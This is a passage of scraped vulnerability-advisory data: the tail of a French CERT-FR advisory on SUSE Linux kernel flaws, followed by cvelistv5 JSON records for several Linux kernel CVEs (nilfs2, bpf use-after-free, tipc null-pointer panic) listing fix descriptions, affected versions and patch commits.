"name": "CVE-2024-41079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41079"
},
{
"name": "CVE-2024-41080",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41080"
},
{
"name": "CVE-2024-41088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41088"
},
{
"name": "CVE-2024-41098",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41098"
},
{
"name": "CVE-2024-42069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42069"
},
{
"name": "CVE-2024-42074",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42074"
},
{
"name": "CVE-2024-42107",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42107"
},
{
"name": "CVE-2024-42114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42114"
},
{
"name": "CVE-2024-42126",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42126"
},
{
"name": "CVE-2024-42139",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42139"
},
{
"name": "CVE-2024-42142",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42142"
},
{
"name": "CVE-2024-42155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42155"
},
{
"name": "CVE-2024-42156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42156"
},
{
"name": "CVE-2024-42158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42158"
},
{
"name": "CVE-2024-42162",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42162"
},
{
"name": "CVE-2024-42228",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42228"
},
{
"name": "CVE-2024-42237",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42237"
},
{
"name": "CVE-2024-42238",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42238"
},
{
"name": "CVE-2024-42239",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42239"
},
{
"name": "CVE-2024-42246",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42246"
},
{
"name": "CVE-2024-42268",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42268"
},
{
"name": "CVE-2024-42271",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42271"
},
{
"name": "CVE-2024-42274",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42274"
},
{
"name": "CVE-2024-42276",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42276"
},
{
"name": "CVE-2024-42277",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42277"
},
{
"name": "CVE-2024-42280",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42280"
},
{
"name": "CVE-2024-42281",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42281"
},
{
"name": "CVE-2024-42283",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42283"
},
{
"name": "CVE-2024-42284",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42284"
},
{
"name": "CVE-2024-42285",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42285"
},
{
"name": "CVE-2024-42286",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42286"
},
{
"name": "CVE-2024-42287",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42287"
},
{
"name": "CVE-2024-42288",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42288"
},
{
"name": "CVE-2024-42289",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42289"
},
{
"name": "CVE-2024-42291",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42291"
},
{
"name": "CVE-2024-42292",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42292"
},
{
"name": "CVE-2024-42295",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42295"
},
{
"name": "CVE-2024-42301",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42301"
},
{
"name": "CVE-2024-42302",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42302"
},
{
"name": "CVE-2024-42308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42308"
},
{
"name": "CVE-2024-42309",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42309"
},
{
"name": "CVE-2024-42310",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42310"
},
{
"name": "CVE-2024-42311",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42311"
},
{
"name": "CVE-2024-42312",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42312"
},
{
"name": "CVE-2024-42313",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42313"
},
{
"name": "CVE-2024-42315",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42315"
},
{
"name": "CVE-2024-42318",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42318"
},
{
"name": "CVE-2024-42319",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42319"
},
{
"name": "CVE-2024-42320",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42320"
},
{
"name": "CVE-2024-42322",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42322"
},
{
"name": "CVE-2024-43816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43816"
},
{
"name": "CVE-2024-43818",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43818"
},
{
"name": "CVE-2024-43819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43819"
},
{
"name": "CVE-2024-43821",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43821"
},
{
"name": "CVE-2024-43823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43823"
},
{
"name": "CVE-2024-43829",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43829"
},
{
"name": "CVE-2024-43830",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43830"
},
{
"name": "CVE-2024-43831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43831"
},
{
"name": "CVE-2024-43834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43834"
},
{
"name": "CVE-2024-43837",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43837"
},
{
"name": "CVE-2024-43839",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43839"
},
{
"name": "CVE-2024-43841",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43841"
},
{
"name": "CVE-2024-43842",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43842"
},
{
"name": "CVE-2024-43846",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43846"
},
{
"name": "CVE-2024-43849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43849"
},
{
"name": "CVE-2024-43853",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43853"
},
{
"name": "CVE-2024-43854",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43854"
},
{
"name": "CVE-2024-43856",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43856"
},
{
"name": "CVE-2024-43858",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43858"
},
{
"name": "CVE-2024-43860",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43860"
},
{
"name": "CVE-2024-43861",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43861"
},
{
"name": "CVE-2024-43863",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43863"
},
{
"name": "CVE-2024-43866",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43866"
},
{
"name": "CVE-2024-43867",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43867"
},
{
"name": "CVE-2024-43871",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43871"
},
{
"name": "CVE-2024-43872",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43872"
},
{
"name": "CVE-2024-43873",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43873"
},
{
"name": "CVE-2024-43879",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43879"
},
{
"name": "CVE-2024-43880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43880"
},
{
"name": "CVE-2024-43882",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43882"
},
{
"name": "CVE-2024-43883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43883"
},
{
"name": "CVE-2024-43884",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43884"
},
{
"name": "CVE-2024-43889",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43889"
},
{
"name": "CVE-2024-43892",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43892"
},
{
"name": "CVE-2024-43893",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43893"
},
{
"name": "CVE-2024-43894",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43894"
},
{
"name": "CVE-2024-43895",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43895"
},
{
"name": "CVE-2024-43899",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43899"
},
{
"name": "CVE-2024-43900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43900"
},
{
"name": "CVE-2024-43902",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43902"
},
{
"name": "CVE-2024-43903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43903"
},
{
"name": "CVE-2024-43904",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43904"
},
{
"name": "CVE-2024-43905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43905"
},
{
"name": "CVE-2024-43907",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43907"
},
{
"name": "CVE-2024-43908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43908"
},
{
"name": "CVE-2024-43909",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43909"
},
{
"name": "CVE-2024-44938",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44938"
},
{
"name": "CVE-2024-44939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44939"
},
{
"name": "CVE-2024-44947",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44947"
}
],
"initial_release_date": "2024-10-04T00:00:00",
"last_revision_date": "2024-10-04T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0840",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-10-04T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2024-09-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2024:3467-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20243467-1"
},
{
"published_at": "2024-09-30",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2024:3499-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20243499-1"
},
{
"published_at": "2024-09-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2024:3483-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20243483-1"
},
{
"published_at": "2024-09-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2024:3468-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20243468-1"
}
]
}
CVE-2024-42143 (GCVE-0-2024-42143)
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2024-08-22T00:01:12.570Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42143",
"datePublished": "2024-07-30T07:46:36.904Z",
"dateRejected": "2024-08-22T00:01:12.570Z",
"dateReserved": "2024-07-29T15:50:41.190Z",
"dateUpdated": "2024-08-22T00:01:12.570Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42295 (GCVE-0-2024-42295)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: handle inconsistent state in nilfs_btnode_create_block()
Syzbot reported that a buffer state inconsistency was detected in
nilfs_btnode_create_block(), triggering a kernel bug.
It is not appropriate to treat this inconsistency as a bug; it can occur
if the argument block address (the buffer index of the newly created
block) is a virtual block number and has been reallocated due to
corruption of the bitmap used to manage its allocation state.
So, modify nilfs_btnode_create_block() and its callers to treat it as a
possible filesystem error, rather than triggering a kernel bug.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a60be987d45dd510aeb54389526f9957cfab106c Version: a60be987d45dd510aeb54389526f9957cfab106c Version: a60be987d45dd510aeb54389526f9957cfab106c Version: a60be987d45dd510aeb54389526f9957cfab106c Version: a60be987d45dd510aeb54389526f9957cfab106c Version: a60be987d45dd510aeb54389526f9957cfab106c Version: a60be987d45dd510aeb54389526f9957cfab106c Version: a60be987d45dd510aeb54389526f9957cfab106c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42295",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:10:50.851556Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:29.125Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/btnode.c",
"fs/nilfs2/btree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "19cce46238ffe3546e44b9c74057103ff8b24c62",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
},
{
"lessThan": "02b87e6334a38c65eef49848d3f1ac422f0b2a44",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
},
{
"lessThan": "5f0a6800b8aec1b453c7fe4c44fcaac5ffe9d52e",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
},
{
"lessThan": "e34191cce3ee63dfa5fb241904aaf2a042d5b6d8",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
},
{
"lessThan": "012be828a118bf496e666ef1fc47fc0e7358ada2",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
},
{
"lessThan": "be56dfc9be0604291267c07b0e27a69a6bda4899",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
},
{
"lessThan": "366c3f688dd0288cbe38af1d3a886b5c62372e4a",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
},
{
"lessThan": "4811f7af6090e8f5a398fbdd766f903ef6c0d787",
"status": "affected",
"version": "a60be987d45dd510aeb54389526f9957cfab106c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/btnode.c",
"fs/nilfs2/btree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.30"
},
{
"lessThan": "2.6.30",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: handle inconsistent state in nilfs_btnode_create_block()\n\nSyzbot reported that a buffer state inconsistency was detected in\nnilfs_btnode_create_block(), triggering a kernel bug.\n\nIt is not appropriate to treat this inconsistency as a bug; it can occur\nif the argument block address (the buffer index of the newly created\nblock) is a virtual block number and has been reallocated due to\ncorruption of the bitmap used to manage its allocation state.\n\nSo, modify nilfs_btnode_create_block() and its callers to treat it as a\npossible filesystem error, rather than triggering a kernel bug."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:11.112Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/19cce46238ffe3546e44b9c74057103ff8b24c62"
},
{
"url": "https://git.kernel.org/stable/c/02b87e6334a38c65eef49848d3f1ac422f0b2a44"
},
{
"url": "https://git.kernel.org/stable/c/5f0a6800b8aec1b453c7fe4c44fcaac5ffe9d52e"
},
{
"url": "https://git.kernel.org/stable/c/e34191cce3ee63dfa5fb241904aaf2a042d5b6d8"
},
{
"url": "https://git.kernel.org/stable/c/012be828a118bf496e666ef1fc47fc0e7358ada2"
},
{
"url": "https://git.kernel.org/stable/c/be56dfc9be0604291267c07b0e27a69a6bda4899"
},
{
"url": "https://git.kernel.org/stable/c/366c3f688dd0288cbe38af1d3a886b5c62372e4a"
},
{
"url": "https://git.kernel.org/stable/c/4811f7af6090e8f5a398fbdd766f903ef6c0d787"
}
],
"title": "nilfs2: handle inconsistent state in nilfs_btnode_create_block()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42295",
"datePublished": "2024-08-17T09:09:03.618Z",
"dateReserved": "2024-07-30T07:40:12.269Z",
"dateUpdated": "2025-05-04T09:26:11.112Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-40909 (GCVE-0-2024-40909)
Vulnerability from cvelistv5
Published
2024-07-12 12:20
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix a potential use-after-free in bpf_link_free()
After commit 1a80dbcb2dba, bpf_link can be freed by
link->ops->dealloc_deferred, but the code still tests and uses
link->ops->dealloc afterward, which leads to a use-after-free as
reported by syzbot. Actually, one of them should be sufficient, so
just call one of them instead of both. Also add a WARN_ON() in case
of any problematic implementation.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:55.487Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/91cff53136daeff50816b0baeafd38a6976f6209"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa97b8fed9896f1e89cb657513e483a152d4c382"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2884dc7d08d98a89d8d65121524bb7533183a63a"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-40909",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:06:09.099919Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:37.410Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/syscall.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "91cff53136daeff50816b0baeafd38a6976f6209",
"status": "affected",
"version": "876941f533e7b47fc69977fc4551c02f2d18af97",
"versionType": "git"
},
{
"lessThan": "fa97b8fed9896f1e89cb657513e483a152d4c382",
"status": "affected",
"version": "1a80dbcb2dbaf6e4c216e62e30fa7d3daa8001ce",
"versionType": "git"
},
{
"lessThan": "2884dc7d08d98a89d8d65121524bb7533183a63a",
"status": "affected",
"version": "1a80dbcb2dbaf6e4c216e62e30fa7d3daa8001ce",
"versionType": "git"
},
{
"status": "affected",
"version": "5d8d447777564b35f67000e7838e7ccb64d525c8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/syscall.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.35",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.35",
"versionStartIncluding": "6.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.6",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.8.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix a potential use-after-free in bpf_link_free()\n\nAfter commit 1a80dbcb2dba, bpf_link can be freed by\nlink-\u003eops-\u003edealloc_deferred, but the code still tests and uses\nlink-\u003eops-\u003edealloc afterward, which leads to a use-after-free as\nreported by syzbot. Actually, one of them should be sufficient, so\njust call one of them instead of both. Also add a WARN_ON() in case\nof any problematic implementation."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:08.471Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/91cff53136daeff50816b0baeafd38a6976f6209"
},
{
"url": "https://git.kernel.org/stable/c/fa97b8fed9896f1e89cb657513e483a152d4c382"
},
{
"url": "https://git.kernel.org/stable/c/2884dc7d08d98a89d8d65121524bb7533183a63a"
}
],
"title": "bpf: Fix a potential use-after-free in bpf_link_free()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-40909",
"datePublished": "2024-07-12T12:20:48.447Z",
"dateReserved": "2024-07-12T12:17:45.580Z",
"dateUpdated": "2025-05-04T12:57:08.471Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48865 (GCVE-0-2022-48865)
Vulnerability from cvelistv5
Published
2024-07-16 12:25
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tipc: fix kernel panic when enabling bearer
When enabling a bearer on a node, a kernel panic is observed:
[ 4.498085] RIP: 0010:tipc_mon_prep+0x4e/0x130 [tipc]
...
[ 4.520030] Call Trace:
[ 4.520689] <IRQ>
[ 4.521236] tipc_link_build_proto_msg+0x375/0x750 [tipc]
[ 4.522654] tipc_link_build_state_msg+0x48/0xc0 [tipc]
[ 4.524034] __tipc_node_link_up+0xd7/0x290 [tipc]
[ 4.525292] tipc_rcv+0x5da/0x730 [tipc]
[ 4.526346] ? __netif_receive_skb_core+0xb7/0xfc0
[ 4.527601] tipc_l2_rcv_msg+0x5e/0x90 [tipc]
[ 4.528737] __netif_receive_skb_list_core+0x20b/0x260
[ 4.530068] netif_receive_skb_list_internal+0x1bf/0x2e0
[ 4.531450] ? dev_gro_receive+0x4c2/0x680
[ 4.532512] napi_complete_done+0x6f/0x180
[ 4.533570] virtnet_poll+0x29c/0x42e [virtio_net]
...
The node in question is receiving activate messages in another
thread after changing bearer status to allow message sending/
receiving in current thread:
thread 1 | thread 2
-------- | --------
|
tipc_enable_bearer() |
test_and_set_bit_lock() |
tipc_bearer_xmit_skb() |
| tipc_l2_rcv_msg()
| tipc_rcv()
| __tipc_node_link_up()
| tipc_link_build_state_msg()
| tipc_link_build_proto_msg()
| tipc_mon_prep()
| {
| ...
| // null-pointer dereference
| u16 gen = mon->dom_gen;
| ...
| }
// Not being executed yet |
tipc_mon_create() |
{ |
... |
// allocate |
mon = kzalloc(); |
... |
} |
Monitoring pointer in thread 2 is dereferenced before monitoring data
is allocated in thread 1. This causes kernel panic.
This commit fixes it by allocating the monitoring data before enabling
the bearer to receive messages.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:25:01.624Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2de76d37d4a6dca9b96ea51da24d4290e6cfa1a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f96dc3adb9a97b8f3dfdb88796483491a3006b71"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f4f59fdbc748805b08c13dae14c01f0518c77c94"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be4977b847f5d5cedb64d50eaaf2218c3a55a3a3"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48865",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:25:18.991470Z",
